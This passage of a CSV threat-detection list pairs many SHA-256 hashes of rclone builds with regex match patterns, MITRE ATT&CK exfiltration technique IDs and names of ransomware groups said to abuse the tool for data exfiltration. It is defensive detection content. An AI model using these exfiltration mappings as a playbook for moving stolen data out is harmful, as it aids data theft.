Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4a641858ba780c2ebe714eb7a29f3c254c1ca77cc38bcb91c326f2b7fdb04e93*",".{0,1000}4a641858ba780c2ebe714eb7a29f3c254c1ca77cc38bcb91c326f2b7fdb04e93.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4aa58ab0200ea5d75c2256933eeb1da1939fe741ded667c97809a2f64e3dd545*",".{0,1000}4aa58ab0200ea5d75c2256933eeb1da1939fe741ded667c97809a2f64e3dd545.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4ac568db513a2f768797b6e0567c6158c518badf907493a7567191ac7e5daff3*",".{0,1000}4ac568db513a2f768797b6e0567c6158c518badf907493a7567191ac7e5daff3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4acdeafa77e33da7c65fe87f23e52b5d1e7768fc307bca5da1bc1c4af1f25612*",".{0,1000}4acdeafa77e33da7c65fe87f23e52b5d1e7768fc307bca5da1bc1c4af1f25612.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4ad31603e4c12ec939ad7cc0c64f0545644e256b5180d458cb20461a82646fd0*",".{0,1000}4ad31603e4c12ec939ad7cc0c64f0545644e256b5180d458cb20461a82646fd0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4ae725aa9632f0b441ae858c378c5b97322315cfea4445c2b03c58363a58fe37*",".{0,1000}4ae725aa9632f0b441ae858c378c5b97322315cfea4445c2b03c58363a58fe37.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4b237151154d322c14c5075688d9553c99b5076db50eaa114cf04e302d07b4a7*",".{0,1000}4b237151154d322c14c5075688d9553c99b5076db50eaa114cf04e302d07b4a7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4b24ad142d1a16975056d11b6ea348fb49e150109422e04c78b7b934c420a679*",".{0,1000}4b24ad142d1a16975056d11b6ea348fb49e150109422e04c78b7b934c420a679.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4b32d5e7e01617675e41032f6285dd2334ce5143cc1457c06eabe5bba0a1657f*",".{0,1000}4b32d5e7e01617675e41032f6285dd2334ce5143cc1457c06eabe5bba0a1657f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4b33c31207212855998ef003cbe8fac7d6ced944f89f56cca6f152c706eedfb6*",".{0,1000}4b33c31207212855998ef003cbe8fac7d6ced944f89f56cca6f152c706eedfb6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4b6f076b8a518a49444b774e06d814026f85678e5a9139b88e533ded60d03672*",".{0,1000}4b6f076b8a518a49444b774e06d814026f85678e5a9139b88e533ded60d03672.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4bbfb1e757467a2601bd97984990f52183623293f20e2c03bfe4a744af2742e3*",".{0,1000}4bbfb1e757467a2601bd97984990f52183623293f20e2c03bfe4a744af2742e3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4be713f2b888f93d3b271f35d699e027da7bf23e7e79caa8281a856465381441*",".{0,1000}4be713f2b888f93d3b271f35d699e027da7bf23e7e79caa8281a856465381441.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4bfa481a7c9e0aeb73be8680893e5c56f3b44966993b0bd5f1e603dfdd4e2214*",".{0,1000}4bfa481a7c9e0aeb73be8680893e5c56f3b44966993b0bd5f1e603dfdd4e2214.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4c1725016b58ea1a8ae96c842321a2d9ec1f91563e278961c8b3cbe2dcda4a40*",".{0,1000}4c1725016b58ea1a8ae96c842321a2d9ec1f91563e278961c8b3cbe2dcda4a40.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4c26c5aeb6a516fd5292a51d2360b059ef4ada958c0d9d2040e3221cc438c825*",".{0,1000}4c26c5aeb6a516fd5292a51d2360b059ef4ada958c0d9d2040e3221cc438c825.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4c407a3b4aac3656e8da10f6234c8daa48a7eea7e92220660c8f92595fa05a7f*",".{0,1000}4c407a3b4aac3656e8da10f6234c8daa48a7eea7e92220660c8f92595fa05a7f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4c71870eebb79a989ecd6c6f62ea23433ac2b5ea50dcd445464742e51b3c03cd*",".{0,1000}4c71870eebb79a989ecd6c6f62ea23433ac2b5ea50dcd445464742e51b3c03cd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4c9a5de428ce8e34b37f5cee75622f4a681cb3306edfd44e6068b9ecd2d68939*",".{0,1000}4c9a5de428ce8e34b37f5cee75622f4a681cb3306edfd44e6068b9ecd2d68939.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4cc0452dbc2770d13549c1a1ed707e5b11851a18a2dcae80c98d211ca9bb5c22*",".{0,1000}4cc0452dbc2770d13549c1a1ed707e5b11851a18a2dcae80c98d211ca9bb5c22.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4ccf381a687d001906f0ee5896e6c66cd9a0139d326ea18cea02968a62b06160*",".{0,1000}4ccf381a687d001906f0ee5896e6c66cd9a0139d326ea18cea02968a62b06160.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4ce340c17289861ff5e21249624acbe0450b8490a88595a33da6456737231567*",".{0,1000}4ce340c17289861ff5e21249624acbe0450b8490a88595a33da6456737231567.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4d07c284d462bb31ea9fdcea2b6682b33dca1e9e8c19570965095c79b80adc82*",".{0,1000}4d07c284d462bb31ea9fdcea2b6682b33dca1e9e8c19570965095c79b80adc82.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4d14248e2743086512dd2af95259ca2085bf495ad5a09a8d37ede040eff5fb3d*",".{0,1000}4d14248e2743086512dd2af95259ca2085bf495ad5a09a8d37ede040eff5fb3d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4d149ac8e1f4c181ccd0aaaf5d9271a695775869c9fe2fa24593bf61acb0e7eb*",".{0,1000}4d149ac8e1f4c181ccd0aaaf5d9271a695775869c9fe2fa24593bf61acb0e7eb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4d1d50a5b4888aa8eca10624073759ab8376c8b1acb38a238831d40074792524*",".{0,1000}4d1d50a5b4888aa8eca10624073759ab8376c8b1acb38a238831d40074792524.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4d33f49c7729f8959d49cbf5399c8bc6236274e6342f39398a903a9779f1dddc*",".{0,1000}4d33f49c7729f8959d49cbf5399c8bc6236274e6342f39398a903a9779f1dddc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4dc6142aea78bb86f1236fe38e570b715990503c09733418c0cd2300e45651e4*",".{0,1000}4dc6142aea78bb86f1236fe38e570b715990503c09733418c0cd2300e45651e4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4e18982beb557529c90acdc5701f4b11d4d8d310872e06565927d0e902316df2*",".{0,1000}4e18982beb557529c90acdc5701f4b11d4d8d310872e06565927d0e902316df2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4e815350382249ffb6d9520262bbce81f45f63126134a0c365eb648a4d27e6ea*",".{0,1000}4e815350382249ffb6d9520262bbce81f45f63126134a0c365eb648a4d27e6ea.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4effd67edbd0e9e5894223df9ce97c635e2056db54bd0cf602fa00a99c27eef3*",".{0,1000}4effd67edbd0e9e5894223df9ce97c635e2056db54bd0cf602fa00a99c27eef3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4f0d1578a3f8a5fedbba8f32cbe54455250307616c0cf29c062b76d081806268*",".{0,1000}4f0d1578a3f8a5fedbba8f32cbe54455250307616c0cf29c062b76d081806268.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4f3dda32302104fc37f7c6dbb7d8683b4a18a08de2848539cc86e08dad2ea82f*",".{0,1000}4f3dda32302104fc37f7c6dbb7d8683b4a18a08de2848539cc86e08dad2ea82f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4f54cf83a83c4c3b2468f606d9e2ae3cfd2149072cdd6fa00d25c7956ced0613*",".{0,1000}4f54cf83a83c4c3b2468f606d9e2ae3cfd2149072cdd6fa00d25c7956ced0613.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4f6dab3a4ee7ab3b41766af778e54cef4a7e140c5fea5df81ed7ae625fbaaf45*",".{0,1000}4f6dab3a4ee7ab3b41766af778e54cef4a7e140c5fea5df81ed7ae625fbaaf45.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*4f6e2bc4765bab597dd391900bed4320b958a1435c5a6ef24e291afa18b929a4*",".{0,1000}4f6e2bc4765bab597dd391900bed4320b958a1435c5a6ef24e291afa18b929a4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" 